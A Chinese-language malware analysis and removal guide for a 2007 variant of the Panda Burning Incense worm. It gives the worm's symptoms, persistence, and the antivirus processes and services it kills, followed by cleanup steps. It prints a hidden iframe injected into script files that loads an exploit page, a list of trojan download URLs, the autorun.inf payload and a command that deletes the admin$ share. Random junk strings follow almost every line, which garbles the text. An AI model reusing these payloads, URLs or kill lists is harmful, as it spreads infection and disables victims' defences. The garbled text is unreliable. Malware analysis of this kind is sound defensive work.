熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe F/ZFO5C%  
jUM'f24  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） F}{%*EJ  
=s":Mx,o  
中文名称：（尼姆亚，熊猫烧香） ya1 aWs~  
hhaiHi!$  
病毒大小：68,570 字节 i<F7/p "
-  
3as=EYm  
编写语言：Borland Delphi 6.0 - 7.0 m[xl)/e  
O Ol:  
加壳方式：FSG 2.0 -> bart/xt h_?`ESI~  
;ZUj2WxE  
发现时间：2007.1.16 s>o#Ob@4'  
SbGdcCB  
危害等级：高 T='uqKW\  
y@l&B+2ks  
一、病毒描述： 0Qa0  
BeLD`4K  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 JD#q6&|  
)XN%pn  
二：中毒现象： ;iuwIdo6c  
=_#b .8K  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 p
p"#pl  
is8i_FoD,n  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 k5E2{&wZ  
,i6E L  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 Op-z"inw  
^%,{R},s  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> Oe;#q  
R?iCJ5m  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 ,:PMS8pS  
|:5O|m '  
6：不能正常使用任务管理器，SREng.exe等工具。 TiI/I`A  
<b H*f w  
7：无故的向外发包，连接局域网中其他机器。
KbLSK  
?d3K:|g  
三：技术分析 *@''OyL  
L0"|4=  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe eZOR{|z  
4&cQW)  
建立注册表自启动项: [tkx84M8  
}y6@YfV${  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] V?S}%-a  
zA9q`ePS  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" Ztmh z_u7  
7he,(V  
2：查找反病毒窗体病毒结束相关进程: `z'
8"s  
~\JB)ca.  
天网防火墙 i'li;xUhZ  
3XlQ4  
virusscan )).=MTk  
`[5xncZ-  
symantec antivirus &zF>5@fM  
n7bVL#Sq[  
system safety monitor ((A@VcX  
#aL.E(%  
system repair engineer UxNn5(:sM@  
Q,5PscE6&k  
wrapped gift killer dP_QkO  
,WWd%DF)  
游戏木马检测大师 AVQcD`V3B  
a%Q`R;W  
超级巡警 S.`y%t.GP  
+pqbl*W;1  
3：结束以下进程: 8_!qoW@B  
O80Z7  
mcshield.exe DQY1oM)D!  
0]7jb_n1  
vstskmgr.exe g/.FJ-I*  
=F_uK7W  
naprdmgr.exe #).^k-
  
4j3_OUwWZx  
updaterui.exe 5%2~/ "  
y_Lnk=Q ^  
tbmon.exe .5; JnJI  
 Culv/  
scan32.exe LmJjO:W}^y  
k_}$d{X  
ravmond.exe &6CDIxH{  
acS~%^"<_  
ccenter.exe ?MFC(Wsh  
\m|5Aqs  
ravtask.exe B bmw[Qf\  
]~]TZb  
rav.exe mh"PAp  
;g?PK5rB(  
ravmon.exe .)tQ&2  
@
xdtl{5G  
ravmond.exe  dHx4yFS  
x} =,'Ko}3  
ravstub.exe @Dsw.@/  
O:GPuVb\  
kvxp.kxp Ag0 6M U  
SYi
!%  
kvmonxp.kxp 0"e["q{|  
MMrN#&r  
kvcenter.kxp k^d]EF  
VvIUAn  
kvsrvxp.exe %TI3Eb  
fB<Qs.T  
kregex.exe %G(VYCeK  
FFZ?-sE  
uihost.exe n#"G)+h3#  
[@qjy*5p  
trojdie.kxp 0Md.3
kY  
u^SInanw  
frogagent.exe [gUD +  
AB%i|t  
kvxp.kxp VOj7Tz9UD  
Yz2N(g[  
kvmonxp.kxp ,1 H|{<  
rYt|[Pk  
kvcenter.kxp wclj9&k  
2|?U%YrHWs  
kvsrvxp.exe N}/V2K]Q  
Y!]a*==  
kregex.exe p}==aNZK  
h(@.bt#
 
uihost.exe kJB:=iq/x$  
j{FRD8]V  
trojdie.kxp \h[*oeh  
@>VX]Qe^X  
frogagent.exe 3-{WFnA  
p&\QkI=  
logo1_.exe Heqr1btK  
n\Lsm  
logo_1.exe :s+?"'DP  
Zt41fPQ  
rundl132.exe ,^ ,R .T  
T*B`8P  
taskmgr.exe VG7#C@>Z  
&b:y#gvJ:  
msconfig.exe rgXX,+c
O  
1h`F*:nva  
regedit.exe Edc3YSg%;  
3s]o~I2x  
sreng.exe hyPS 6Y'1  
4：禁用下列服务: `;G@qp:A  
1k"t[^  
schedule KRm)|bgE  
Y[b08{/  
sharedaccess ;L76V$&  
oJ5n*[qUI  
rsccenter d$\n@}8eZp  
x/]G"?Uix  
rsravmon &N7q9t  
(i{ZxWW&  
rsccenter RI'}C`%v  
?gAwMP(>  
kvwsc dw}ge,bBic  
3LQu+EsS  
kvsrvxp &)q>Z!C-l  
zvnd@y{[  
kvwsc ^Q0=Ggh  
|jH Yf42Q  
kvsrvxp 8:I-?z;S  
t#f-3zd9  
kavsvc yN[i6oe  
wmbG$T%k  
avp mbhh  
!6taOT>v  
avp j/wQ2"@a  
ou)0tX3j  
kavsvc FS)C<T]t  
[70 _uq  
mcafeeframework Ug#B( }/  
,{ 0&NX  
mcshield R-iWbLD  
Ea" -
n9  
mctaskmanager IWddJb~hu  
R S
Ww4}  
mcafeeframework ~r})&`5  
W>CG;x{  
mcshield ;&w_.j*Is  
FFVh~em{  
mctaskmanager KCa@0  
J8@bPS27q  
navapsvc 9QF,ynE  
`P|V&;}K  
wscsvc h|z59h&X8G  
gi_f8RP=2a  
kpfwsvc =td(}3|D Y  
{A MAQ  
sndsrvc Wb^g{F!W  
?ODBW/{[G  
ccproxy @&E7Pg5  
|ns9ziTDI  
ccevtmgr W-1Ub
|8C  
}lx'NY~(W  
ccsetmgr ZD?LsD3  
5NKyF  
spbbcsvc 68qCY  
KAy uv  
symantec core lc
,/p.!+  
d$MewDWUN  
npfmntor M}" KAa  
WR*<|  
mskservice DQN"85AIZ  
(H|^Ow5  
firesvc n5#9o},oK  
wD pL9q  
5：删除下列注册表项: tD,~i"0;  
unN*L  
software\microsoft\windows\currentversion\run\ravtask ]MMXpj,9h  
!1+!;R@&H>  
software\microsoft\windows\currentversion\run\kvmonxp :WSszak  
y8di-d3_  
software\microsoft\windows\currentversion\run\kav gln X C  
i[e-dT:*R  
software\microsoft\windows\currentversion\run\kavpersonal50 3SF J8  
bFIv}c+;  
software\microsoft\windows\currentversion\run\mcafeeupdaterui gEq";B%?  
<oTNo>U/k  
software\microsoft\windows\currentversion\run\network associates error reporting service u&Xn#fh  
7I@@}A  
software\microsoft\windows\currentversion\run\shstatexe 2ZMVYa2%(  
Uv:NY1(3!  
software\microsoft\windows\currentversion\run\ylive.exe R|7_iMIZ  
A$J?-  
software\microsoft\windows\currentversion\run\yassistse ueJ_F#y  
2\xEMec  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） 7lQ:}&  
VSc)0eyn  
7：跳过下列目录: Wl>$<D4mO[  
K./L'Me  
windows rEsGf+4  
S\118TpD  
winnt lJ4&kF=t  
Jy#21  
systemvolumeinformation 4
eP-yi  
z]M
u8  
recycled Gc:oSvm  
m-|~tve  
windowsnt n0@
\x=9  
o
IY@xuj  
windowsupdate [/eRc  
7|7sA'1cM  
windowsmediaplayer JI~@H /j  
EAnw:yUV(  
outlookexpress ?pp|~A)b  
kF"G {5  
netmeeting I/w=!Ih  
*}NJ  
commonfiles ~]lVixr9  
IWAp  
complusapplications x5nw/''[2  
<<ifd?  
commonfiles vWpkU<&3|  
[=KA
5c<  
messenger MF~Tr0tOC  
L+$9 ,<'
[  
installshieldinstallationinformation -D30(g{O  
&H@OLyC  
msn 9^1.nE(R&  
oSqkAAGz\  
microsoftfrontpage Nm=\~LP90  
|R$/oq  
moviemaker R4g% $}  
>c 5V VA8  
msngaminzone {nlqQ.jO  
92K#xM/  
8：删除*.gho备份文件. qx3`5)ef  
ZA/:\6gm  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. )o@-h85";  
WscNjWQ^TD  
autorun.inf内容： 9
-?[%8  
ZAcW@xfb  
程序代码 )\r;|DN  
v %fRq!~  
[AutoRun] 7|eD}=jy  
V$XCe  
OPEN=setup.exe 6H_7M(f  
P~"`Og+  
shellexecute=setup.exe *~%# =o  
u|a+:r)*4  
shell\Auto\command=setup.exe G_UxR9Qo  
h q
&2o  
10：删除共享：cmd.exe /c net share admin$ /del /y XQ]5W(EP  
;F!wyTF>}  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 DsP FBq  
a\m@I_r.N  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 2m/=0sb\{  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 O*7Gl G  
zf>r@>S!L  
目前下载列表如下： hhVyz{u  
HC*V\vz  
http://www.krvkr.com/down/cq.exe %SJ9Jr,  
GGR hM1II  
http://www.krvkr.com/down/mh.exe E1e#E3Yq}s  
Q
]
}aZ4L  
http://www.krvkr.com/down/my.exe M4:}`p=  
* -Kf  
http://www.krvkr.com/down/wl.exe Kqt,sJ  
^"!j m  
http://www.krvkr.com/down/rx.exe a:(.{z?nM  
!@x'?+
  
http://www.krvkr.com/down/wow.exe V:w=h>z8  
K8UgP?c;0  
http://www.krvkr.com/down/zt.exe C r~!N|(  
,mE*k79L6  
http://www.krvkr.com/down/wm.exe . !|3a  
mzl %h[9iI  
http://www.krvkr.com/down/dj.exe aT %A<'O!  
StP7t  
http://www.krvkr.com/cn/iechajian.exe ag$mc8-p[  
J c~{ E  
到此病毒行为分析完毕。 .D`""up|{  
\*V`w@
  
四：Sec120.Com专家解决方案： qdFYf/y  
B>CG/]  
1：关闭网络共享，断开网络。 c?NXX&  
Gn*vVZ@`x  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前）
{T]^C  
6^]Y])  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 EfR3$sp  
iJza zQ  
4：删除注册表启动项 C>vp oCA  
d+Vx:`tT  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] tp,e:4\8Q  
_O-ZII~  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" 'Zdjd]  
3UIR^Rh+  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe ]KS|r+  
>!vb;a!  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 {/x["2a1  
Q_bF^4gt  
7：如果电脑上有脚本文件，将病毒代码全部删除。 Vn`-w  
[4qx+ypT  
8：关闭系统的自动播放功能。 }?pY~f  
]Y'oxh  
这样就基本上将病毒清除了